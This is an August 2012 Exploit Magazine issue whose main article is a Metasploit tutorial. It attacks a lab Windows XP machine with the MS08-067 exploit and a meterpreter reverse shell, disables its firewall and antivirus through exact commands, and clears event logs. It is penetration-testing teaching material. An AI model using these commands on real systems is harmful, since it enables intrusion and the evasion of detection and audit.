Atola InsightThat’s all you need for data recovery.

Atola Technology offers Atola Insight – the only data recovery device that covers the entire data recovery process: in-depth HDD diagnostics, firmware recovery, HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool.

This product is the best choice for seasoned professionals as well as start-up data recovery companies.

• Case management

• Real time current monitor

• Firmware area backup system

• Serial port and power control

• Write protection switch

Certification Exam 2 - Certified Cyber 51 Pentesting Expert - (CC51PE)

MONTH 7

Certification Exam 1 - Certified Cyber 51 Pentesting Professional - (CC51PP)

MONTH 6

Web Application Penetration Testing - level 3MONTH 5

Web Application Penetration Testing - level 1Web Application Penetration Testing - level 2

MONTH 4

Network Penetration Testing - level 3MONTH 3

Network Penetration Testing - level 1Network Penetration Testing - level 2

MONTH 2

Vulnerability Assessment - level 1Vulnerability Assessment - level 2Vulnerability Assessment - level 3

MONTH 1

Get trained today through our exclusive 7-months hands-on course.Gain access to our complex LAB environment exploiting vulnerabilities across many platforms.Receive a trainer dedicated to you during the 7 months.10 different hands-on engagements, 2 different certifications levels.

Editor’s notE

4 thE Exploit magazinE august 2012

Dear All, If you are reading this, I presume that you trusted us and reached for the Exploitmag. Thank you for that. As you may see, we launched entirely new project that targets all types of exploits – hence the name. This month, we host Abhinav Das and Sud-hanshu Chauhan, who will expatiate on Metasploit. I genuinely hope that you will like our content and spread the word about us, so we can write for the wider public. In the nearest future, you can expect issues on: DoS Attacks, Security flaws on WSDL, SOAP. The hidden catch is that those issues will also be for free. Do not hesitate and subscribe to our magazine.

In case you have any: questions, suggestions, doubts – please, reach me at: m.wisniewski@software.com.pl for more details.

Kindest Regards

teamEditor in Chief: Grzegorz Tabaka grzegorz.tabaka@hakin9.org

Managing Editor: Michał Wiśniewskim.wisniewski@software.com.pl

Editorial Advisory Board: Rebecca Wynn, Matt Jonkman, Donald Iverson, Michael Munt, Gary S. Milefsky, Julian Evans, Aby Rao

Proofreaders: Michael Munt, Rebecca Wynn, Elliott Bujan, Bob Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson, Robert Wood

Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeff rey Smith, Robert Wood, Nana Onumah, Rissone Ruggero, Inaki Rodriguez

Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a The Exploit Magazine.

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa Dudzicewa.dudzic@software.com.pl

Production Director: Andrzej Kuca andrzej.kuca@software.com.pl

DTP: Ireneusz PogroszewskiArt Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl

Publisher: Software Press Sp. z o.o. SK02-682 Warszawa, ul. Bokserska 1Phone: 1 917 338 3631www.hakin9.org/en

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.All trade marks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used

program by

Mathematical formulas created by Design Science

MathType™

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

http://1337day.com/

mEtasploit

thE Exploit magazinE august 20126

Did you know or even dream that somebody can gain Administrator level access on your computer through the Internet with just your IP address? Did you know that just

because you didn't update your Flash version the last time it prompted you to, you make your com-puter vulnerable to attack and exploitation? Just be-cause you clicked the 'Remind-me-later' button the last time Flash player asked you to update it, you set your computer at risk of being hacked? Yes, it is possible. And with the current level of technology and certain neat tools, it is very easy as well. Any-body who reads, understands and tries out what is in this issue of Hakin9, can do it. They can own somebody's Windows XP box remotely by running an exploit on it, through the Internet. After that, the rest is in their hands, depending on what kind of damage they wish to do. They may just decide to wipe out your operating system, they might decide to print tons of smiley's on important office work, or they might just set up a keylogger/RAT (Remote Administration Tool) which records your keystrokes and sends them to a remote FTP server. Yes, this is very much possible, and hence, it becomes very important to know how to conduct such an attack, so as to have a chance of blocking it.

During my visits to various colleges and institu-tions to deliver my seminars and workshops, I get

bombarded by lots of questions. Amongst these questions is one, which is something, any penetra-tion tester/ethical hacker should know – “How many stages or phases does a pentest have?” This ques-tion obviously can have multiple answers based on who the pentester is, what his objectives are and other criteria. But, most of my hacker pals and I agree that there are 5 stages/phases for a success-ful and good hack. They are:

• Reconnaissance• Scanning• Gaining access (Exploitation)• Maintaining access• Covering tracks

Of the above mentioned stages, this issue of Ha-kin9 will concentrate on the third stage of a suc-cessful hack/penetration test – Exploitation.

Exploitation is the process of manipulating the behavior of software or applications to make them behave in an unpredictable fashion which was not intended by the developers. Exploitation is usually done through bugs/glitches/vulnerabilities in soft-ware or applications. Hackers who are specialized in the art of exploit-writing and exploit-development can find bugs in software and applications and write exploits for existing bugs. These exploits may be

Metasploit Demystified – Introduction to the Metasploit Framework

Have you ever wondered, have you ever given it a thought that your IP (Internet Protocol) address is a very important identification of your computer and that could actually put you, your sensitive data and your computer at risk to attack?

By Abhinav Das – www.abhinavdas.in; @theabhinavdas

mEtasploit

thE Exploit magazinE august 2012 7

used by other hackers to gain various privileges on a remote target machine (Figure 1).

The Metasploit Framework, referred to as msf in later parts of this issue is a part of the Metasploit Project. The Metasploit Framework, in all its sim-plicity is a framework consisting of a large number of community written exploits which are updated from time to time. Metasploit provides an easy to use, easy to maintain, easy to code exploit devel-opment environment. It is so simple to use, it is a must-have for newbie hackers. Metasploit also cur-rently has a GUI which makes using it, all the more simpler.

Metasploit was originally written in Perl, but has been completely rewritten into Ruby. It has been created by HD Moore, and has been sold to a secu-rity company – Rapid7 in 2009.

In 2011, Rapid7 introduced and released a free community version of the product – Metasploit Community Edition, which is a free web-based in-terface for Metasploit.

There are many other versions of the Metasploit Framework – Metasploit Express and Metasploit Pro. Metasploit Pro is the best amongst these. However, it is commercial, and the free version is a 7-day trial.

If you are into the field of computer/network secu-rity, there must be a point of time where you have heard of or even used the Metasploit Framework.

It is a must have for most penetration testers as it makes our jobs easier. For those of you that have just heard about the Metasploit Framework but didn't find it very useful, I'll be talking about it, in the next few pages and drawing up many of its uses which will amaze you (for sure) and get you more interested in computer security.

The Metasploit Framework comes in many differ-ent forms. But the most widely used are the msf-console and Armitage (its graphical interface). For those that are not very comfortable with the CLI, Metasploit now ships with a new GUI – Armitage. Armitage does one thing for sure, it makes the job of pentration testing very easy by adding a GUI to the Metasploit Framework.

The ability to combine any exploit with any pay-load, hence giving an environment which is ex-tremely flexible and easy to use. That is one of the best features of Metasploit.

The great thing about Metasploit, which makes it different from a lot of other amazing tools, is that it can run on almost any platform. It runs on all ver-sions of Unix (including Linux and Mac OS X). Apart from *nix environments, Metasploit also runs on Windows!

Before going into the first example use and demo of the Metasploit Framework, its usage, I would like to talk about three things which have to be clear to every aspiring hacker and penetration tester.

Figure 1. Metasploit Framework Logo

mEtasploit

thE Exploit magazinE august 20128

• Vulnerability• Exploit• Payload

What is a Vulnerability?Vulnerabilities are side-effects which are a result of programming flaws/design flaws/implementation flaws. Most common are vulnerabilities that are cre-ated due to programming flaws. Vulnerabilities are weaknesses which are caused due to any or many of the mentioned reasons. Vulnerabilities leave a system open to exploitation by hackers. They are loop-holes that give an attacker access into your computer.

What is an Exploit?An Exploit is a sequence of commands/code which take advantage of a vulnerability to cause unex-pected behavior, which is not planned by the person that designed and coded the software/system. This is, obviously, the definition of ‘exploit’ as a noun, not a verb. The verb form of ‘exploit’ would mean, put-ting an exploit in action and actually exploiting the system.

What is Payload?Simply defined, payload is the part of malicious code or an exploit that actually performs a destruc-

tive operation, and takes advantage of a vulnerabil-ity.

After understanding these terms, it might be use-ful to give you the basic steps of exploiting using the Metasploit Framework, just to demonstrate that it is really easy to use Metasploit. Metasploit is as close as it comes to having a point, click and ex-ploit interface.

• Choose and configure an exploit.• Check if target is vulnerable/susceptible to the

chosen exploit.• Choose and configure a payload.• Executing the payload.

NoteOptionally, some people perform a step between 3 and 4, which can be called 3.5, which is, to encode the payload so that an IPS (Intrusion Prevention System)/IDS (Intrusion Detection System) will not be able to catch the payload.

Now, lets get to the interesting part. Whenev-er you try to learn a foreign language, you learn it, by starting to speak it, starting to use it. The same applies to the technology world and tech-nology-related things and subjects. You have to start using them, applying them in real life scenar-

Figure 2. BackTrack 5 Login Prompt

mEtasploit

thE Exploit magazinE august 2012 9

ios to actually become good with them. Hence, at this stage of the tutorial, I would like to walk you through an actual exploitation, so you know how to run and use Metasploit. I usually suggest peo-ple to use Linux while trying to hack, the environ-ment is amazing and makes everything very easy to do. The current demo will be on a Linux en-vironment, if you don’t already know Linux, don’t panic! Just do everything, step-by-step, as writ-ten, and you’ll be fine.

Lot of people wonder what OS to use, what OS to start off with. There are many free Linux distribu-tions available for immediate download as ISO’s. Great thing about ISO’s are that you can either use them in a virtual machine or you can burn them onto a DVD, making a Live-DVD or you can use a tool like Unetbootin to make a bootable pendrive with that ISO.

The current most preferred Linux distribution, used for penetration testing is BackTrack 5. BackTrack 5 is a Linux distribution based on the Debian GNU

distro. It is used for digital forensics and penetration testing mainly because of the numerous tools that if has, all pre-installed and pre-set-up, ready to use. You may not use all of the tools on BackTrack 5 but you sure will use some. I personally suggest getting BackTrack 5 due to its ease of use. It also has the Metasploit Framework pre-installed.

The latest version of BackTrack – BackTrack 5, comes in many flavours. It can be downloaded from http://www.backtrack-linux.org/downloads/.

Now, there are two options with the BackTrack 5 GNOME 32-bit version. You can choose to down-load it as an ISO or as a VMWare Image. Down-loading it as an ISO will give you multiple usages, as I have mentioned above. But if you’re planning on using BackTrack 5 as a Virtual Machine, run-ning over your existing OS, I suggest downloading the VMWare Image. This image has VMWare-Tools pre-installed hence, easing up the installation pro-cess for you. Now, you can use VMWare Player or VMWare Workstation to run BackTrack 5. I person-

Figure 3. Logging into the Graphical Interface using the ‚startx’ command

Figure 4. Navigating to the Metasploit menu on BT5 32-bit GNOME

mEtasploit

thE Exploit magazinE august 201210

ally prfer and suggest the VMWare Workstation. It is an amazing software, very nice, very clean, ex-tremely easy to use.

So, let me jot down the steps to download and run BackTrack 5:

• Download the BackTrack 5 ISO/VMWare Image from http://www.backtrack-linux.org/downloads/.

• Download Unetbootin, if you want to create a bootable usb-stick.

• Download VMWare Player/VMWare Worksta-tion if you want to run BackTrack 5 as a Virtual Machine.

• If you want to create Live Usb Install, follow the steps mentioned here – http://www.backtrack-linux.org/tutorials/usb-live-install/.

• If you want to use the VMWare Image, just ex-tract the contents of the file that you download-ed to any directory. You will find a .vmx file. Double click it, it should open in the virtualza-tion software that you downloaded.

• Run the Virtual Machine/Reboot into the Live USB.

• Congratulations, your attacker system is ready.

NoteRunning a Live USB has a disadvantage, which is, that you would now require another computer on the local network running the target box specifica-tions. If you use Virtualization software like VM-Ware Workstation, then you can have the target OS running as another virtual machine inside VMWare Workstation, and both attacker and target operating systems will be on top of your host operating sys-tem. I prefer it that way, but you can do what you feel comfortable doing.

If you have setup everything as instructed, you will have booted into BackTrack 5 either as a Virtual Machine or as a Live USB. Now, you should see a lot of text appearing on a Command Line Interface (CLI) on the screen, to show that BackTrack is boot-ing. Wait for the login prompt, which looks like this: Figure 2.

You should see something similar to the above picture. When you are prompted to enter the log-in details, you should enter root and toor as the username and password respectively. After log-ging in, you should see something like the screen below. To start X Windows, type startx as shown Figure 3.

After booting into BackTrack 5, you would need to navigate to the Metasploit Framework menu. I’m currently using a BackTrack 5 32-bit GNOME VM-Ware Image on VMWare Workstation. Here, you need to navigate to Applications > BackTrack > Ex-ploitation Tools > Network Exploitation > Metasploit Framework (Figure 4).

Here, you’ll have four options (1) Armitage (2) ms-fcli (3) msfconsole (4) msfupdate. You can select option (3) msfconsole from the menu.

Another way of accessing the Metasploit Frame-work is by opening up a terminal and typing – /pentest/exploits/framework3/msfconsole. Either way, you should see something like this (Figure 5).

Now, if you are uncomfortable with using a com-mand line interface, Metasploit now ships with Ar-mitage – a GUI for Metasploit. You can access Ar-mitage through the menus, as I have shown and select (1) Armitage, or you can start it from the com-mand line. Armitage can be started by opening the terminal and typing /pentest/exploits/framework3/

armitage.

Figure 5. msfconsole

mEtasploit

thE Exploit magazinE august 2012 11

NoteYou should have an instance of Metasploit already running. If you do, click ‘Connect.’ If you do not al-ready have Metasploit running, click ‘Start MSF,’ which starts the Metasploit service and also con-nect Armitage to it.

Once Armitage is up and running, you should have something like this: Figure 6.

Good, you’re done setting up the attacker ma-chine. Now, its time to set up the target machine.

For the target machine, I would like you to setup Windows XP SP2 to test against. It will be a very interesting and fun exercise if you can setup Win-dows XP SP2 on your Virtualization Software. Most people would have a Windows XP CD lying around somewhere, if you don’t, you can always download

either the ISO or the VMWare Image from torrents and other places. Also, if you can’t find the right file to download, a lot of people suggest downloading it from here – http://nvd.nist.gov/fdcc/index.cfm.

NoteIf you download it from NIST, you will have to re-move all the patches that are installed in the VM. You can extract the contents and run it. The user-name / password scheme for the image is Re-named_Admin / P@ssw0rd123456.

I won’t include any screenshots for this process though. This is something that is easily ‘google-able.’ And most of you should know how to install Windows XP on your machine, so that shouldn’t be much of a problem.

Figure 6. The Armitage interface

Figure 7.

mEtasploit

thE Exploit magazinE august 201212

Windows XP Post Install:

• Turn Windows Firewall ‘Off.’• Turn off Windows updates.• Open ‘Security Center,’ select ‘Change the way

Security Center alerts me,’ and deselect all.• In the control panel, go to ‘Tools,’ then ‘Folder

Options.’ Select the ‘View’ tab, scroll to the bot-tom and un-check the box next to ‘Use simple file sharing.’ Save changes by clicking ‘Ok.’

Now, some people tend to wonder and often ask me, “Why did we setup Windows XP SP 2?” I say, “Lets start with something easy, just to break the ice.” Once you are used to Metasploit and are fa-miliar with whole process of exploitation using Metasploit, everything else should automatically fall in place and become very easy for you to do.

So, lets start the attack. Power up both your Back-Track 5 Virtual Machine and your Windows XP SP2 Virtual Machine and lets get started.

Step 1Find out the local IP address of the target/victim machine – which is the Windows XP machine. You can do this by going to the Windows XP Virtual Ma-chine, opening up command prompt and doing – ipconfig. That should give you something like this: Figure 7.

Step 2You found the local IP address of you Windows XP Machine. What you now have to do is run an nmap

scan from your attacker machine – BackTrack 5. To do this, open a terminal and type nmap -v -n <ip_address> (replace <ip_address> with the IP Address of your Windows XP machine). So, in this case, I would run nmap -v -n 192.168.0.101.

You will find some services running. We already know what services will be running, so, we don’t need to bother much about the output of that scan. Something that would concern us more is the ver-sion of the software running on those ports. For this, we can use the -sV flag on Nmap. So, the scan becomes nmap -sV -n <ip_address>.

Step 3We already know what vulnerability exists on the Windows XP SP2 machine, so we will directly go to Metasploit and go through the process of running the exploit.

Step 4We know that the exploit to be used. We shall be using the exploit/windows/smb/ms08_067_netapi ex-ploit. We can do this by opening up msfconsole and typing use exploit/windows/smb/ms08_067_netapi. After that, you should get something like this: Figure 8.

Step 5So, currently, you are using the exploit called ms08_067_netapi which Windows XP SP2 machines are vulnerable to. Next, you will have to select and set what payload you want to use. There are many payloads available for this exploit.

Figure 8. use exploit/windows/ms08_067_netapi

mEtasploit

thE Exploit magazinE august 2012 13

Figure 10. Show options

Figure 9. Setting the payload if the exploit is successful

mEtasploit

thE Exploit magazinE august 201214

NoteI already know what exploit Windows XP SP2 ma-chines are vulnerable to, hence, I directly used the ms08_067_netapi exploit. But, in normal, real-life sit-uations, it is not so easy. You would need to use command such as search in the MSF console to find exploit related to the services that the remote tar-get is running. Once you find an exploit, you can use it by following the same steps. I repeat, I know for sure that Win XP SP2 is vulnerable to this ex-ploit, and have thus used it. Do not try attacking an Apache machine with this exploit and ask me “Why isn’t it working?”

If you are using an Apache box as a target, you can do a search on the MSFConsole to find exploits that might work on the Apache server. Another im-portant thing is the version numbers of the services that are running on the victim.

To find the version number of the target box, you will need to run a port-scan on it. There are multiple tools to do this, I have demonstrated the use of one such tool called nmap earlier in this demonstraton. There are various other tools to perform network mapping. You can see which one suits you the best, and use that. But, nmap is considered the most pow-erful network mapping tool, by industry standards.

We will be using the reverse_tcp payload by issu-ing the following command – set PAYLOADwindows/

meterpreter/reverse_tcp. Now, we get something like this: Figure 9.

Step 6Now, we have completed setting the payload. You can check the awailable options by doing show op-tions. Like thus: Figure 10.

Step 7The worst is over! If you found that difficult, knock youself out with a trout. Now, all that is remaining for you to do is set the RHOST and LHOST. RHOST is the IP Address of the target machine (which we found in step 1) and LHOST is the IP Address of the attacker (you can find that by doing ifconfig on your Back-Track machine by opening another terminal. To set RHOST, you just need to type set RHOST <ip_address_of_target> and to set LHOST, you need to type set LHOST <ip_address_of_attacker>. After that, you should get something like this: Figure 11.

Figure 8Now, the last thing you need to do, is type exploit. If you set up everything correctly, and didn’t make any mistakes on setting RHOST and LHOST, you should be able to successfully exploit your Windows XP SP2 Machine. After a few lines, you should see the meterpreter> prompt. This shows that you’ve successfully hacked the remote machine and that your payload has successfully run. You can run pc command to list the processes on the remote victim machine. You can view processes, kill processes, and do whatever you like to the target. I personally prefer doing a shutdown -s -t 0.

Back to the BasicsNow that you have some idea of how simple it is to use and run exploits using the Metasploit Frame-work, and now that you have tasted the simplicity and ease of running exploits, let us go back to the basics of Metasploit. We will discuss finer details of the Framework and talk about its various parts and their functions in a bit more detail.

Figure 11. Setting RHOST and LHOST

mEtasploit

thE Exploit magazinE august 2012 15

We will revisit the msfconsole, exploits, payloads and the meterpreter. We will talk about what they are, how they work and obviously, how to use them.

MsfconsoleUndoubtedly, the most popular MSF interface is the msfconsole. It acts as a centralised console and though it may seem intimidating at fist, is the best MSF interface to use. The reason it looks intimi-dating and scary is the obvious fact that you don’t know the commands and don’t have GUI to help you (Figure 12).

There are various benefits of the msfconsole:

• Execution of external commands (Yes, you can use external commands!)

• Is very stable and contains maximum features.• Is a simple and clean way to access features of

the Framework owing to full readline support, command completion and other things.

Launching (can be done in multiple ways):

• Navigating to msfconsole through the menu. Usually Applications > BackTrack > Exploita-tion Tools > Network Exploitation > Metasploit Framework.

• Opening terminal and running msfconsole. • Msfconsole is also located in /opt/framework3/msf3/

and /pentest/exploits/framework3/.

NoteBy running msfconsole -h or msfconsole --help you can get various other options.

Due to the wide array of exploits out there, and the obvious difficulty to memorize the location of each and every exploit, the Metasploit Framework has been kind enough to intoduce ‘Tab Completion.’ As you know, in any shell, entering what you know and pressing ‘Tab’ will present you a list of options available for you to chose from, and when there is only a single option, it will auto-complete the string. MSF incorporated tab completion into almost all of its commands to help users navigate though it, from the CLI. Some examples of tab completion as taken from the Offensive Security website are:

• use exploit/windows/dce• use *.netapi.*• set LHOST• show• set TARGET• exp

ExploitsAll of the exploits which are in the Metasploit Frame-work fall under two categories depending on how they work, and how they exploit, or rather, who they exploit.

These two classifications are:

• Active exploits• Passive exploits

Active ExploitsThese exploits attack specific targets or hosts. They attack based on the host that the attacker sets. The RHOST variable tells the MSF who to at-

Figure 12. Msfconsole

mEtasploit

thE Exploit magazinE august 201216

tack. The exploit attacks only that particular host and runs until completion and exits.

NoteYou can always send an active exploit to the back-ground by passing the -j flag. Thus, after configur-ing the exploit, doing exploit -j will force the active module to the background.

A problem with active exploits is that they stop ex-ecution whenever an error is encountered (Figure 13).

This is an example of an active exploit which uses a set of previously gathered user credentials (Fig-ure 14).

Passive ExploitsThese exploits wait patiently for a victim to connect. In short, they exploit incoming hosts that connect to the attacker machine. Passive exploits usually focus on clients including web browsers and FTP clients.

They can be used with email exploits to wait for connections and exploit any incoming host. They

Figure 14. Example exploit

Figure 16. Passive exploit of Cursor vulnerability

Figure 15.

Figure 13. Using exploit -j

mEtasploit

thE Exploit magazinE august 2012 17

do not attack a particular target but exploit anybody that makes a connection to the attacking machine (Figure 15).

An example taken from the Offensive Security website is the use of the animated cursor vulner-ability which doesn’t fire till a victim accesses a ma-licious website (Figure 16).

PayloadsAs we have already discussed, payloads are code that are executed after and exploit successfully completes. Payloads are an interesting part of ex-ploitation. Exploitation is only till you get into a sys-tem, but payloads are a part of post exploitation. Payloads on MSF are of three types:

• Singles• Stagers• Stage

SinglesThese are stand-alone payloads. They are the sim-plest to use. They could do anything from creating a new user on the target machine or just opening up the Calculator.

StagersThese type of payloads are more commonly used, since they give more flexibility during after exploita-tion. Stagers create a network connection between the attacker and the victim machines.

StageStages are parts of a payload that are download-ed by Stager modules. The reason that Stages ex-ist is because Stargers have size constraints. But once a Stager completes its run, it can download any of various Stages with no size limits, such as, a meterpreter, VNC injunction, Iphone ‘ipwn’ shell etc.

Metasploit MeterpreterNow that you know what exploits and payloads are, and since we have discussed the various types of payloads, it becomes easier to understand what the Metasploit Meterpreter is. It is a payload, which us-es DLL injection stagers. It communicates over the

stager socket and establishes an excellent client-side Ruby API.

The Meterpreter is extremely stealthy and low-profile in a sense. This is mainly because it resides entirely in the target machines memory and is nev-er written to the disk. Meterpreter injects itself into compromised processes running on the target ma-chine which is another great aspect since it allows the Meterpreter to infect and migrate to other pro-cesses with ease. Apart from all this, the Meterpret-er uses encrypted communication by default. The Meterpreter is designed to leave as less informa-tion or evidence on the compromised target host as possible.

Meterpreter can be extended and new features can be added to it, without having to rebuild it com-pletely. Features can be added to the Meterpreter by loading extensions. The process of extending it is very simple and seamless and takes minimal time to complete.

Some basic Meterpreter commands are:

Command Functionhelp Shows the available commands and their

uses as a help menu.background Sends the current meterpreter session to

the background and returns you to the msf prompt.

getuid Used to retrieve the UID (User ID) that Me-terpreter server is running as on the host.

ls Used to list the files in the cwd (current working directory).

download Downloads a file from the remote machine.upload Uploads a file to the remote machine.execute Used to execute a command on the remote

target machine.shell Use to invoke a standalone shell on the tar-

get machine.idletime Displays the amount of time that the remote

user has been idle.hashdump Dumps contents of the SAM file/database.ps Displays a list of running processes on the

victims machine.

Now that you have understood the Meterpreter and know some of the basic commands, it is time to see what can be done to a remote target in a

Figure 17. Meterpreter session is running

mEtasploit

thE Exploit magazinE august 201218

real life scenario. If we get into a system that we want to attack, I doubt we will try to shut it down, or open up an instance of the Calculator application. We would want to do something more.

How to remain hidden (Ninja techniques to apply, post-exploitation)We have discussed various things, we have gone through the procedure of attacking a remote host using MSF. We have configured the exploit, and used it. You have been introduced to various types of exploits and payloads. You have also been told about the Meterpreter, its uses, some simple com-mands and what it can do.

Now, we move on, to another interesting part of hacking, which is important for all serious hack-ers and pentesters to know. It is generally called ‘covering your tracks.’ That is, the ability to hack and work, undetected. Firewalls and Anti-viruses pose a threat to hackers. Firewalls, if properly con-figured, can block an attack quite efficiently. Anti-viruses can detect your activities and create hur-dles.

So, we have covered exploitation and gaining ac-cess to a remote host running the Windows XP SP2 operating system. Now, we shall cover another im-portant part of that attack, which is, disabling fire-walls and killing anti-viruses.

For this demonstration, we will use the Windows Firewall and AVG 2012 as the anti-virus.

We left off the last demonstration at the Meter-preter session. You can understand that the exploit was successful and that you are in a meterpreter session by looking for the meterpreter> prompt (Fig-ure 17).

The above image shows that we have successful-ly exploited the target, and that a Meterpreter ses-sion has started.

If you recall the simple Meterpreter commands that I have tabulated earlier, you will remember the command – shell. It is used to get a shell on the re-mote system. So let us run the shell command at the Meterpreter prompt. On doing so, we get some-thing like this: Figure 18.

Now, we have a remote shell on the victim com-puter. The next step, would obviously be – checking if the target system has its Firewall running.

Now that we have a shell on the target computer, we can easily verify whether its Firewall is running using the command netsh firewall show opmode. That should give you something like this: Figure 19.

On looking at the output of the command, we can easily understand that the firewall is enabled. The next step is a no-brainer. We would like to disable the Firewall. Disabling the firewall is easy from the

Figure 18. Getting a remote shell

Figure 20. Disabling the firewall

Figure 19. Checking if Firewall is running on target

mEtasploit

thE Exploit magazinE august 2012 19

shell, hence, we’re not going to exit the shell and return to our Meterpreter session just yet. The com-mand that can be used to disable the firewall is – netsh firewall set opmode mode=disable. This com-

mand, when run from the shell on the remote host, will disable the Firewall. So, you must run the com-mand (Figure 20).

The ‘Ok.’ at the end of the ouput details tells you that the command you have run has completed successfully. That is a very good sign. Sometimes, you might not have the Administrator privilege on the box, and you might need to perform some priv-ilege escalation to get a shell with Administrator rights.

But again, the process is the same, and running the above command will surely disable the Win-dows Firewall.

This screen-shot, taken on the target machine shows that the Windows Firewall has been suc-cessfully disabled (Figure 21).

Great! So, the Firewall has been disabled. That is one guard down for the target machine. Now, we can proceed to disabling and killing the anti-viruses running on the target box. For now, we can exit the remote shell, and go back to the meterpreter ses-sion by using the exit command.

Luckily, killing anti-viruses isn’t as tough to do as it was a long time ago. Meterpreter has a custom script that makes that job very easy. All you have to do is use the command run killav. Killav is the name of the script which probably is an abbrevia-tion for ‘Kill Anti-viruses.’ This automates the pro-cess of killing an anti-virus, so, run the command, sit back, and wait for it to complete (Figure 22).

Now, you’ll see a list of processes that have been killed by the killav script. If you look at the output, you’ll notice that it killed a process called avgrsx.exe. But did it really kill the anti-virus? You can have

Figure 21. Firewall is successfully disabled

Figure 22. Running Meterpreter’s killav script

Figure 23. Output of the tasklist command

mEtasploit

thE Exploit magazinE august 201220

a look at the source-code of the killav script to un-derstand what it actually does. You will see that the script has a list of process names, which it matches,

to the processes running on the target machine and kills them. So, now comes the big question, was the AVG anti-virus really killed?

Figure 25. Shortlisting tasklist output

Figure 24. Categorizing tasklist output

Figure 26. Process info

mEtasploit

thE Exploit magazinE august 2012 21

For understanding this, we would need to revisit the remote host by opening a shell on it. To do that, run the command shell. Now, to get a list of pro-cesses running on the machine, you can run the

command tasklist. On running the command, you will get output that looks a lot like this: Figure 23.

In the output created by running the tasklist com-mand, you will notice process names starting with

‘avg.’ So that means, the killav script, didn’t really kill the antivirus.

If you want to see what service the processes belong to, you can run tasklist /svc. This gives the same list of process, with the service that they run. You should get something like this: Figure 24.

This is only to categorize the tasklist. Now, since we are only interested in the ‘avg’ tasks that are running, we can run the command – tasklist /

svc | find /I “avg”. This tells the tar-get computer to list processes running whose names start with ‘avg.’ Now, you should get a shorter list that looks like this: Figure 25.

Now, after some trial and error, we notice that the avgwd service and the avgidsagent service keep restarting the other processes even if we kill them. This tells us that these are the two main processes and the most suspi-cious. Anti-virus companies usually tend to start so many processes so as to confuse the attacker on which is the main process that controls the rest. Let us now, take a closer look at avgwd and avgidsagent. We can do this by running the command – sc queryex <process>, like shown below: Figure 26.

If you notice in the output of the pro-cess description of both these pro-cesses, you will see, written, NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN. That tells us, that the processes cannot be stopped or paused.That is a draw-back, yes, but also gives us a hint on what should be our course of action.

So now, we will try to disable the pro-cesses from auto-starting at reboot, so that they will not start when we reboot the host machine. We can do that by using the command sc config <process> start=disabled. You should do that for both the processes – avgwd and avgidsagent (Figure 27).

Now, the next step, is debatable, and is not very neat. There are multiple op-tions for us right now, we can reboot the system or wait for the user to re-boot the system. Since this is just a tu-torial on disabling the firewall and anti-virus, and since it is not a real pentest,

Figure 29. Kill remaining avg processes

Figure 30. Using the clearev script

Figure 31. Proof that clearev worked

Figure 28. Main avg processes not running

Figure 27. Disabling the main AV processes from auto-starting at boot-time

mEtasploit

thE Exploit magazinE august 201222

I’m going to go ahead with the bad route, which I suggest none of you take – I’ll reboot the system. You can do this by giving the command shutdown -r -t 0 or you can exit the shell, come back to your meterpreter session and use the command reboot.

Now, wait for the computer to reboot. After it has, examine the system for any ‘avg’ processes that are running using the command tasklist /svc | find /I “avg”. You should see this: Figure 28.

There are now only three processes running in-stead of five. The two processes that we disabled are not running, that means we can kill these three pro-cesses without any problem. To do that, we can use taskkill /F /IM “avg”. This command kills processes that are running whose name has ‘avg’ (Figure 29).

Congratulations. You have successfully disabled the Firewall and killed the Anti-virus. Now, you can continue doing whatever you like, without the fear of interruption from either.

NoteA lot of hackers like to automate this whole process and write scripts with commands. Scripts that can be run with certain flags. They code them as exten-sions to the meterpreter. If you are good at coding, you can give that a shot as well.

Another thing, that some people like to do, which I always suggest you do, after you finish whatev-er you need to on the target machine is – clearing logs. Again, MSF helps us with this, since it has a built-in script called clearev which clears all the sys-tem log files. You can use that, by exiting the shell, and going back to the meterpreter session. Run the clearev script (Figure 30).

The next screen-shot has been taken on the target machine after running the clearev script (Figure 31).

MySQL Injection through MetasploitWe have seen how to exploit a vulnerability on a re-mote system. We have seen how to gain access on it remotely using MSF. We have also see how we can disable the Firewall and Anti-virus running on a system using MSF.

Now, we shall move to another interesting ar-ea. We will attack databases with the Metasploit Framework. I thought that this could be the last demonstration for this issue on using the Metasploit Framework, but it will definitely be a very useful demonstration since MySQL is very common on the internet today, more common than Oracle.

In most of the penetration tests that I have done for my clients, I have found at least one system run-

Figure 33. Running the version check and discovering the MySQL server version

Figure 32. Using auxiliary/scanner/mysql/mysql_version modulew

mEtasploit

thE Exploit magazinE august 2012 23

ning a MySQL server. I’m sure that most of you face similar situations.

In this demonstration I will show you how you can attack a MySQL database using MSF. I suggest running a Linux operating system with the MySQL server, and setting that up on your Virtual Machine. Its really not difficult to do, you just need to down-load the right files from the right places and set them up. Setting up the MySQL server isn’t really in the scope of this article. Here, I’m going to try and concentrate on attacking the setup. You can proba-bly find some nice tutorials on setting up the MySQL server using Google.

So, after setting up the MySQL Server on a Vir-tual Machine and starting the services required. You would need to find the IP address of the target machine using ifconfig. Now, before we even be-gin our attack, we should find out more about the MySQL Server running on the target box. Knowing versions of a service running on the target always helps since it allows us to find multiple vulnerabili-ties and sometimes, even 0days on that particular version of software. So, we can do this by loading a MSF module using the command use auxiliary/scanner/mysql/mysql_version (Figure 32).

Now, the only thing we need is the remote IP address (IP address of target machine) to exe-cute this module to find the MySQL server ver-sion. This, we have already found. If you haven’t, you can find it. After you do, you must set the RHOST value as the target IP address and then ex-ecute it by using the command run, as follows: Figure 33.

Looking at the output, we can easily figure out that the target box is running MySQL 5.0.51a-3ubuntu5 (protocol 10). This information is very useful to us, as we can find exploits for it, using simple Google searches.

